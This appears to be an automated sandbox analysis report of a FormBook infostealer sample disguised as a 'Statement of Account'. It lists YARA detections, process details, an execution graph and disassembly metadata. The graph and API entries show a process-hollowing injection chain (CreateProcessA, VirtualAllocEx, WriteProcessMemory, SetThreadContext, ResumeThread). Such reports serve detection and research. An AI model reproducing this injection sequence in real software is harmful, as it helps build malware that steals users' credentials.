                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:10:34:11
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                                                                                Imagebase:0x9e0000
                                                                                                                                                File size:29'184 bytes
                                                                                                                                                MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:4.1%
                                                                                                                                                  Total number of Nodes:193
                                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                                  execution_graph 32389 7810d90 32390 7810dca 32389->32390 32391 7810e5b 32390->32391 32395 7810e88 32390->32395 32400 7810e78 32390->32400 32392 7810e51 32396 781130d 32395->32396 32397 7810eb6 32395->32397 32396->32392 32397->32396 32405 78117a0 32397->32405 32412 78117b0 32397->32412 32401 781130d 32400->32401 32402 7810eb6 32400->32402 32401->32392 32402->32401 32403 78117a0 2 API calls 32402->32403 32404 78117b0 2 API calls 32402->32404 32403->32401 32404->32401 32410 78117a0 CreateIconFromResourceEx 32405->32410 32411 78117b0 CreateIconFromResourceEx 32405->32411 32406 78117ca 32407 78117d7 32406->32407 32408 78117ef CreateIconFromResourceEx 32406->32408 32407->32396 32409 781187e 32408->32409 32409->32396 32410->32406 32411->32406 32413 78117ca 32412->32413 32417 78117a0 CreateIconFromResourceEx 32412->32417 32418 78117b0 CreateIconFromResourceEx 32412->32418 32414 78117d7 32413->32414 32415 78117ef CreateIconFromResourceEx 32413->32415 32414->32396 32416 781187e 32415->32416 32416->32396 32417->32413 32418->32413 32419 7a351f2 32420 7a351fc 32419->32420 32421 7a350bc 32419->32421 32420->32421 32424 7a37760 32420->32424 32442 7a37770 32420->32442 32425 7a37770 32424->32425 32460 7a37e20 32425->32460 32465 7a37b9d 32425->32465 32471 7a37bde 32425->32471 32477 7a37f39 32425->32477 32481 7a37eda 32425->32481 32485 7a384bb 32425->32485 32489 7a38474 32425->32489 32493 7a38357 32425->32493 32498 7a37e73 32425->32498 32503 7a38013 32425->32503 32508 7a3806c 32425->32508 32513 7a37bce 32425->32513 32518 7a384c9 32425->32518 32523 7a3842a 32425->32523 32527 7a38145 32425->32527 32426 7a377ae 32426->32421 32443 7a3778a 32442->32443 32445 7a37e20 2 API calls 32443->32445 32446 7a38145 2 API calls 32443->32446 32447 7a3842a 2 API calls 32443->32447 32448 7a384c9 2 API calls 32443->32448 32449 7a37bce 2 API calls 32443->32449 32450 7a3806c 2 API calls 32443->32450 32451 7a38013 2 API calls 32443->32451 32452 7a37e73 2 API calls 32443->32452 32453 7a38357 2 API calls 32443->32453 32454 7a38474 2 API calls 32443->32454 32455 7a384bb 2 API calls 32443->32455 32456 7a37eda 2 API calls 32443->32456 32457 7a37f39 2 API calls 32443->32457 32458 7a37bde 2 API calls 32443->32458 32459 7a37b9d 2 API calls 32443->32459 32444 7a377ae 32444->32421 32445->32444 32446->32444 32447->32444 32448->32444 32449->32444 32450->32444 32451->32444 32452->32444 32453->32444 32454->32444 32455->32444 32456->32444 32457->32444 32458->32444 32459->32444 32461 7a37e26 32460->32461 32532 7a34398 32461->32532 32536 7a34390 32461->32536 32462 7a37e53 32462->32426 32467 7a37ba8 32465->32467 32466 7a37c99 32466->32426 32467->32466 32540 7a34ca0 32467->32540 32544 7a34c95 32467->32544 32472 7a37c99 32471->32472 32473 7a37bd2 32471->32473 32472->32426 32473->32472 32475 7a34ca0 CreateProcessA 32473->32475 32476 7a34c95 CreateProcessA 32473->32476 32474 7a37ce4 32474->32426 32475->32474 32476->32474 32548 7a34958 32477->32548 32552 7a34956 32477->32552 32478 7a37f57 32556 7a34440 32481->32556 32560 7a34448 32481->32560 32482 7a37ef4 32482->32426 32486 7a38473 32485->32486 32486->32485 32487 7a34440 Wow64SetThreadContext 32486->32487 32488 7a34448 Wow64SetThreadContext 32486->32488 32487->32486 32488->32486 32491 7a34440 Wow64SetThreadContext 32489->32491 32492 7a34448 Wow64SetThreadContext 32489->32492 32490 7a38473 32490->32489 32491->32490 32492->32490 32494 7a386a0 32493->32494 32564 7a34a11 32494->32564 32569 7a34a18 32494->32569 32495 7a386c4 32499 7a37e9c 32498->32499 32501 7a34a11 WriteProcessMemory 32499->32501 32502 7a34a18 WriteProcessMemory 32499->32502 32500 7a37ebd 32500->32426 32501->32500 32502->32500 32504 7a38070 32503->32504 32506 7a34a11 WriteProcessMemory 32504->32506 32507 7a34a18 WriteProcessMemory 32504->32507 32505 7a3853d 32506->32505 32507->32505 32509 7a38081 32508->32509 32511 7a34a11 WriteProcessMemory 32509->32511 32512 7a34a18 WriteProcessMemory 32509->32512 32510 7a3853d 32511->32510 32512->32510 32514 7a37c00 32513->32514 32516 7a34ca0 CreateProcessA 32514->32516 32517 7a34c95 CreateProcessA 32514->32517 32515 7a37ce4 32515->32426 32516->32515 32517->32515 32519 7a37e27 32518->32519 32520 7a37e53 32519->32520 32521 7a34390 ResumeThread 32519->32521 32522 7a34398 ResumeThread 32519->32522 32520->32426 32521->32520 32522->32520 32573 7a34b00 32523->32573 32577 7a34b08 32523->32577 32524 7a38454 32528 7a37e9c 32527->32528 32529 7a37ebd 32527->32529 32530 7a34a11 WriteProcessMemory 32528->32530 32531 7a34a18 WriteProcessMemory 32528->32531 32529->32426 32530->32529 32531->32529 32533 7a343d8 ResumeThread 32532->32533 32535 7a34409 32533->32535 32535->32462 32537 7a34398 ResumeThread 32536->32537 32539 7a34409 32537->32539 32539->32462 32541 7a34d29 32540->32541 32541->32541 32542 7a34e8e CreateProcessA 32541->32542 32543 7a34eeb 32542->32543 32545 7a34d29 32544->32545 32545->32545 32546 7a34e8e CreateProcessA 32545->32546 32547 7a34eeb 32546->32547 32549 7a34998 VirtualAllocEx 32548->32549 32551 7a349d5 32549->32551 32551->32478 32553 7a34958 VirtualAllocEx 32552->32553 32555 7a349d5 32553->32555 32555->32478 32557 7a34448 Wow64SetThreadContext 32556->32557 32559 7a344d5 32557->32559 32559->32482 32561 7a3448d Wow64SetThreadContext 32560->32561 32563 7a344d5 32561->32563 32563->32482 32565 7a349e6 32564->32565 32565->32564 32566 7a349fa 32565->32566 32567 7a34a86 WriteProcessMemory 32565->32567 32566->32495 32568 7a34ab7 32567->32568 32568->32495 32570 7a34a60 WriteProcessMemory 32569->32570 32572 7a34ab7 32570->32572 32572->32495 32574 7a34b08 ReadProcessMemory 32573->32574 32576 7a34b97 32574->32576 32576->32524 32578 7a34b53 ReadProcessMemory 32577->32578 32580 7a34b97 32578->32580 32580->32524 32604 7a38980 32605 7a38b0b 32604->32605 32607 7a389a6 32604->32607 32607->32605 32608 7a332d0 32607->32608 32609 7a38c00 PostMessageW 32608->32609 32610 7a38c6c 32609->32610 32610->32607 32581 13f4668 32582 13f467a 32581->32582 32583 13f4686 32582->32583 32585 13f4779 32582->32585 32586 13f479d 32585->32586 32590 13f4878 32586->32590 32594 13f4888 32586->32594 32592 13f4888 32590->32592 32591 13f498c 32591->32591 32592->32591 32598 13f449c 32592->32598 32595 13f48af 32594->32595 32596 13f449c CreateActCtxA 32595->32596 32597 13f498c 32595->32597 32596->32597 32599 13f5918 CreateActCtxA 32598->32599 32601 13f59db 32599->32601 32601->32601 32611 13fd458 32612 13fd49e GetCurrentProcess 32611->32612 32614 13fd4f0 GetCurrentThread 32612->32614 32618 13fd4e9 32612->32618 32615 13fd52d GetCurrentProcess 32614->32615 32616 13fd526 32614->32616 32617 13fd563 32615->32617 32616->32615 32619 13fd58b GetCurrentThreadId 32617->32619 32618->32614 32620 13fd5bc 32619->32620 32602 13fd6a0 DuplicateHandle 32603 13fd736 32602->32603 32621 13facd0 32622 13facdf 32621->32622 32625 13fadc8 32621->32625 32630 13fadb9 32621->32630 32626 13fadfc 32625->32626 32627 13fadd9 32625->32627 32626->32622 32627->32626 32628 13fb000 GetModuleHandleW 32627->32628 32629 13fb02d 32628->32629 32629->32622 32631 13fadd9 32630->32631 32632 13fadfc 32630->32632 32631->32632 32633 13fb000 GetModuleHandleW 32631->32633 32632->32622 32634 13fb02d 32633->32634 32634->32622

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 07810E88 Relevance: 6.9, Strings: 5, Instructions: 622COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 294 7810e88-7810eb0 295 7811393-78113fc 294->295 296 7810eb6-7810ebb 294->296 303 7811403-781148b 295->303 296->295 297 7810ec1-7810ede 296->297 297->303 304 7810ee4-7810ee8 297->304 340 7811496-7811516 303->340 305 7810ef7-7810efb 304->305 306 7810eea-7810ef4 304->306 307 7810f0a-7810f11 305->307 308 7810efd-7810f07 305->308 306->305 312 7810f17-7810f47 307->312 313 781102c-7811031 307->313 308->307 323 7811716-781173c 312->323 325 7810f4d-7811020 312->325 315 7811033-7811037 313->315 316 7811039-781103e 313->316 315->316 319 7811040-7811044 315->319 320 7811050-7811080 316->320 319->323 324 781104a-781104d 319->324 320->340 341 7811086-7811089 320->341 332 781174c 323->332 333 781173e-781174a 323->333 324->320 325->313 349 7811022 325->349 337 781174f-7811754 332->337 333->337 357 781151d-781159f 340->357 341->340 344 781108f-7811091 341->344 344->340 345 7811097-78110cc 344->345 356 78110d2-78110db 345->356 345->357 349->313 359 78110e1-781113b 356->359 360 781123e-7811242 356->360 362 78115a7-7811629 357->362 397 781114d 359->397 398 781113d-7811146 359->398 360->362 363 7811248-781124c 360->363 365 7811631-781165e 362->365 363->365 366 7811252-7811258 363->366 377 7811665-78116e5 365->377 370 781125a 366->370 371 781125c-7811291 366->371 374 7811298-781129e 370->374 371->374 374->377 378 78112a4-78112ac 374->378 432 78116ec-781170e 377->432 381 78112b3-78112b5 378->381 382 78112ae-78112b2 378->382 388 7811317-781131d 381->388 389 78112b7-78112db 381->389 382->381 393 781133c-781136a 388->393 394 781131f-781133a 388->394 420 78112e4-78112e8 389->420 421 78112dd-78112e2 389->421 413 7811372-781137e 393->413 394->413 404 7811151-7811153 397->404 398->404 405 7811148-781114b 398->405 411 7811155 404->411 412 781115a-781115e 404->412 405->404 411->412 417 7811160-7811167 412->417 418 781116c-7811172 412->418 431 7811384-7811390 413->431 413->432 424 7811209-781120d 417->424 425 7811174-781117a 418->425 426 781117c-7811181 418->426 420->323 429 78112ee-78112f1 420->429 428 78112f4-7811305 421->428 433 781122c-7811238 424->433 434 781120f-7811229 424->434 435 7811187-781118d 425->435 426->435 470 7811307 call 78117a0 428->470 471 7811307 call 78117b0 428->471 429->428 432->323 433->359 433->360 434->433 441 7811193-7811198 435->441 442 781118f-7811191 435->442 438 781130d-7811315 438->413 446 781119a-78111ac 441->446 442->446 450 78111b6-78111bb 446->450 451 78111ae-78111b4 446->451 453 78111c1-78111c8 450->453 451->453 457 78111ca-78111cc 453->457 458 78111ce 453->458 461 78111d3-78111de 457->461 458->461 462 78111e0-78111e3 461->462 463 7811202 461->463 462->424 465 78111e5-78111eb 462->465 463->424 467 78111f2-78111fb 465->467 468 78111ed-78111f0 465->468 467->424 469 78111fd-7811200 467->469 468->463 468->467 469->424 469->463 470->438 471->438
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hhq$Hhq$Hhq$Hhq$Hhq
                                                                                                                                                  • API String ID: 0-1427472961
                                                                                                                                                  • Opcode ID: 7010643719e605dae524d787b9b5a1f3bc490d3cdf27eeafcb1e3a6b3326ce90
                                                                                                                                                  • Instruction ID: 8a186f2e3aad9461850068d25d211f2307843639f7b8fd546193aad3d971af62
                                                                                                                                                  • Opcode Fuzzy Hash: 7010643719e605dae524d787b9b5a1f3bc490d3cdf27eeafcb1e3a6b3326ce90
                                                                                                                                                  • Instruction Fuzzy Hash: D43280B4E002188FDB54DFA8C85479EBBF6BF98300F1485AAD50AEB385DB349D85CB51
                                                                                                                                                  Function 07810E78 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1734347846.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7810000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3de4b398aadecf2e9b652eab768bbaeeadb119349a636a13bb7c2460a4fdc425
                                                                                                                                                  • Instruction ID: 84e375212b41e1f3a136a83e03dd195d09702b5ecb382641dd4457bb8ca1f533
                                                                                                                                                  • Opcode Fuzzy Hash: 3de4b398aadecf2e9b652eab768bbaeeadb119349a636a13bb7c2460a4fdc425
                                                                                                                                                  • Instruction Fuzzy Hash: 36C197B4E002488FCF15CFA9D88479DBBB6AF89310F18C1AAD509EB255EB30D985CF40
                                                                                                                                                  Function 013FD448 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 472 13fd448-13fd4e7 GetCurrentProcess 476 13fd4e9-13fd4ef 472->476 477 13fd4f0-13fd524 GetCurrentThread 472->477 476->477 478 13fd52d-13fd561 GetCurrentProcess 477->478 479 13fd526-13fd52c 477->479 480 13fd56a-13fd585 call 13fd627 478->480 481 13fd563-13fd569 478->481 479->478 485 13fd58b-13fd5ba GetCurrentThreadId 480->485 481->480 486 13fd5bc-13fd5c2 485->486 487 13fd5c3-13fd625 485->487 486->487
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 013FD4D6
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 013FD513
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 013FD550
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013FD5A9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: 5f7cd137d5327844ce974f6f4a23e4a4f352a8c452bcc4a7c94b67a7f5dc570c
                                                                                                                                                  • Instruction ID: 19a15a8d2d860c65be6095cc97aa208de6192ac73496a6d18378ff18d550d435
                                                                                                                                                  • Opcode Fuzzy Hash: 5f7cd137d5327844ce974f6f4a23e4a4f352a8c452bcc4a7c94b67a7f5dc570c
                                                                                                                                                  • Instruction Fuzzy Hash: 075188B09003498FDB14DFA9D548BEEBFF1EF88318F20845DD519A72A0D7749949CB21
                                                                                                                                                  Function 013FD458 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 494 13fd458-13fd4e7 GetCurrentProcess 498 13fd4e9-13fd4ef 494->498 499 13fd4f0-13fd524 GetCurrentThread 494->499 498->499 500 13fd52d-13fd561 GetCurrentProcess 499->500 501 13fd526-13fd52c 499->501 502 13fd56a-13fd585 call 13fd627 500->502 503 13fd563-13fd569 500->503 501->500 507 13fd58b-13fd5ba GetCurrentThreadId 502->507 503->502 508 13fd5bc-13fd5c2 507->508 509 13fd5c3-13fd625 507->509 508->509
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 013FD4D6
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 013FD513
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 013FD550
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 013FD5A9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: fa224a9e8ec3ef57f9bec1f1bb3096693f3d595e4aecc0962f7598d0c3bd6d03
                                                                                                                                                  • Instruction ID: 2bee3c0896b82883488802b8cea3add5371b8563d059e60049e1cf3fe2fdd7a6
                                                                                                                                                  • Opcode Fuzzy Hash: fa224a9e8ec3ef57f9bec1f1bb3096693f3d595e4aecc0962f7598d0c3bd6d03
                                                                                                                                                  • Instruction Fuzzy Hash: 295117B09003098FDB14DFA9D548B9EBBF1EF88318F20845DE519A73A0DB749989CB65
                                                                                                                                                  Function 07A34C95 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 560 7a34c95-7a34d35 562 7a34d37-7a34d41 560->562 563 7a34d6e-7a34d8e 560->563 562->563 564 7a34d43-7a34d45 562->564 568 7a34d90-7a34d9a 563->568 569 7a34dc7-7a34df6 563->569 565 7a34d47-7a34d51 564->565 566 7a34d68-7a34d6b 564->566 570 7a34d53 565->570 571 7a34d55-7a34d64 565->571 566->563 568->569 572 7a34d9c-7a34d9e 568->572 579 7a34df8-7a34e02 569->579 580 7a34e2f-7a34ee9 CreateProcessA 569->580 570->571 571->571 573 7a34d66 571->573 574 7a34dc1-7a34dc4 572->574 575 7a34da0-7a34daa 572->575 573->566 574->569 577 7a34dae-7a34dbd 575->577 578 7a34dac 575->578 577->577 581 7a34dbf 577->581 578->577 579->580 582 7a34e04-7a34e06 579->582 591 7a34ef2-7a34f78 580->591 592 7a34eeb-7a34ef1 580->592 581->574 584 7a34e29-7a34e2c 582->584 585 7a34e08-7a34e12 582->585 584->580 586 7a34e16-7a34e25 585->586 587 7a34e14 585->587 586->586 589 7a34e27 586->589 587->586 589->584 602 7a34f7a-7a34f7e 591->602 603 7a34f88-7a34f8c 591->603 592->591 602->603 604 7a34f80 602->604 605 7a34f8e-7a34f92 603->605 606 7a34f9c-7a34fa0 603->606 604->603 605->606 607 7a34f94 605->607 608 7a34fa2-7a34fa6 606->608 609 7a34fb0-7a34fb4 606->609 607->606 608->609 610 7a34fa8 608->610 611 7a34fc6-7a34fcd 609->611 612 7a34fb6-7a34fbc 609->612 610->609 613 7a34fe4 611->613 614 7a34fcf-7a34fde 611->614 612->611 616 7a34fe5 613->616 614->613 616->616
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34ED6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 6725f4eadddadb4b3a3910b1c810af44fa4fadf2cc8bedc22fa8e3370a756bc7
                                                                                                                                                  • Instruction ID: 3bfc8d89c79e4602ae3c318afc2fdc070c0d0ab4ba1bf2d357e14c7d03a0838d
                                                                                                                                                  • Opcode Fuzzy Hash: 6725f4eadddadb4b3a3910b1c810af44fa4fadf2cc8bedc22fa8e3370a756bc7
                                                                                                                                                  • Instruction Fuzzy Hash: F0A16DB1D0125ACFDF20CF68C8407EDBBB2BF88310F1485A9E818A7290DB749985CF91
                                                                                                                                                  Function 07A34CA0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 617 7a34ca0-7a34d35 619 7a34d37-7a34d41 617->619 620 7a34d6e-7a34d8e 617->620 619->620 621 7a34d43-7a34d45 619->621 625 7a34d90-7a34d9a 620->625 626 7a34dc7-7a34df6 620->626 622 7a34d47-7a34d51 621->622 623 7a34d68-7a34d6b 621->623 627 7a34d53 622->627 628 7a34d55-7a34d64 622->628 623->620 625->626 629 7a34d9c-7a34d9e 625->629 636 7a34df8-7a34e02 626->636 637 7a34e2f-7a34ee9 CreateProcessA 626->637 627->628 628->628 630 7a34d66 628->630 631 7a34dc1-7a34dc4 629->631 632 7a34da0-7a34daa 629->632 630->623 631->626 634 7a34dae-7a34dbd 632->634 635 7a34dac 632->635 634->634 638 7a34dbf 634->638 635->634 636->637 639 7a34e04-7a34e06 636->639 648 7a34ef2-7a34f78 637->648 649 7a34eeb-7a34ef1 637->649 638->631 641 7a34e29-7a34e2c 639->641 642 7a34e08-7a34e12 639->642 641->637 643 7a34e16-7a34e25 642->643 644 7a34e14 642->644 643->643 646 7a34e27 643->646 644->643 646->641 659 7a34f7a-7a34f7e 648->659 660 7a34f88-7a34f8c 648->660 649->648 659->660 661 7a34f80 659->661 662 7a34f8e-7a34f92 660->662 663 7a34f9c-7a34fa0 660->663 661->660 662->663 664 7a34f94 662->664 665 7a34fa2-7a34fa6 663->665 666 7a34fb0-7a34fb4 663->666 664->663 665->666 667 7a34fa8 665->667 668 7a34fc6-7a34fcd 666->668 669 7a34fb6-7a34fbc 666->669 667->666 670 7a34fe4 668->670 671 7a34fcf-7a34fde 668->671 669->668 673 7a34fe5 670->673 671->670 673->673
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34ED6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: aada2696a7b22f8d423f812bb80c72c4e0e11ec409c3bdd1182e5cfcf3e9b06a
                                                                                                                                                  • Instruction ID: 517a83b62bc4e91ddfdb52f5d8ab8f9ac308765958a1f882494f11269f1984b9
                                                                                                                                                  • Opcode Fuzzy Hash: aada2696a7b22f8d423f812bb80c72c4e0e11ec409c3bdd1182e5cfcf3e9b06a
                                                                                                                                                  • Instruction Fuzzy Hash: C7916DB1D0125ADFDF20DF68C8407EDBBB2BF88310F1485A9E819A7290DB749985CF91
                                                                                                                                                  Function 013FADC8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 674 13fadc8-13fadd7 675 13fadd9-13fade6 call 13fa120 674->675 676 13fae03-13fae07 674->676 681 13fadfc 675->681 682 13fade8 675->682 678 13fae1b-13fae5c 676->678 679 13fae09-13fae13 676->679 685 13fae5e-13fae66 678->685 686 13fae69-13fae77 678->686 679->678 681->676 729 13fadee call 13fb051 682->729 730 13fadee call 13fb060 682->730 685->686 687 13fae9b-13fae9d 686->687 688 13fae79-13fae7e 686->688 692 13faea0-13faea7 687->692 690 13fae89 688->690 691 13fae80-13fae87 call 13fa12c 688->691 689 13fadf4-13fadf6 689->681 693 13faf38-13faff8 689->693 695 13fae8b-13fae99 690->695 691->695 696 13faea9-13faeb1 692->696 697 13faeb4-13faebb 692->697 724 13faffa-13faffd 693->724 725 13fb000-13fb02b GetModuleHandleW 693->725 695->692 696->697 699 13faebd-13faec5 697->699 700 13faec8-13faed1 call 13fa13c 697->700 699->700 705 13faede-13faee3 700->705 706 13faed3-13faedb 700->706 707 13faee5-13faeec 705->707 708 13faf01-13faf0e 705->708 706->705 707->708 710 13faeee-13faefe call 13fa14c call 13fa15c 707->710 715 13faf31-13faf37 708->715 716 13faf10-13faf2e 708->716 710->708 716->715 724->725 726 13fb02d-13fb033 725->726 727 13fb034-13fb048 725->727 726->727 729->689 730->689
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 013FB01E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: cf14e232e753f0fff43fc999bc3fce9594887fc36d29d52caf1f8bf04321ca97
                                                                                                                                                  • Instruction ID: 95cc12bff2ee67781d2d668618e0571777322baa2c788344b8470e81fec256b8
                                                                                                                                                  • Opcode Fuzzy Hash: cf14e232e753f0fff43fc999bc3fce9594887fc36d29d52caf1f8bf04321ca97
                                                                                                                                                  • Instruction Fuzzy Hash: 8F8115B0A00B458FD724DF29D45475ABBF1FF88348F00892DD68ADBA50D775E949CB90
                                                                                                                                                  Function 013F449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 841 13f449c-13f59d9 CreateActCtxA 844 13f59db-13f59e1 841->844 845 13f59e2-13f5a3c 841->845 844->845 852 13f5a3e-13f5a41 845->852 853 13f5a4b-13f5a4f 845->853 852->853 854 13f5a51-13f5a5d 853->854 855 13f5a60 853->855 854->855 857 13f5a61 855->857 857->857
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 013F59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: 52732b37884682d00721f9ea248ec7925d78929e0d1522d05a00cf6026cf2180
                                                                                                                                                  • Instruction ID: 626c1a387b36ac5c6a9b866b4bc5b46e134dc1bd713fc9deb2feed0c0f8dc259
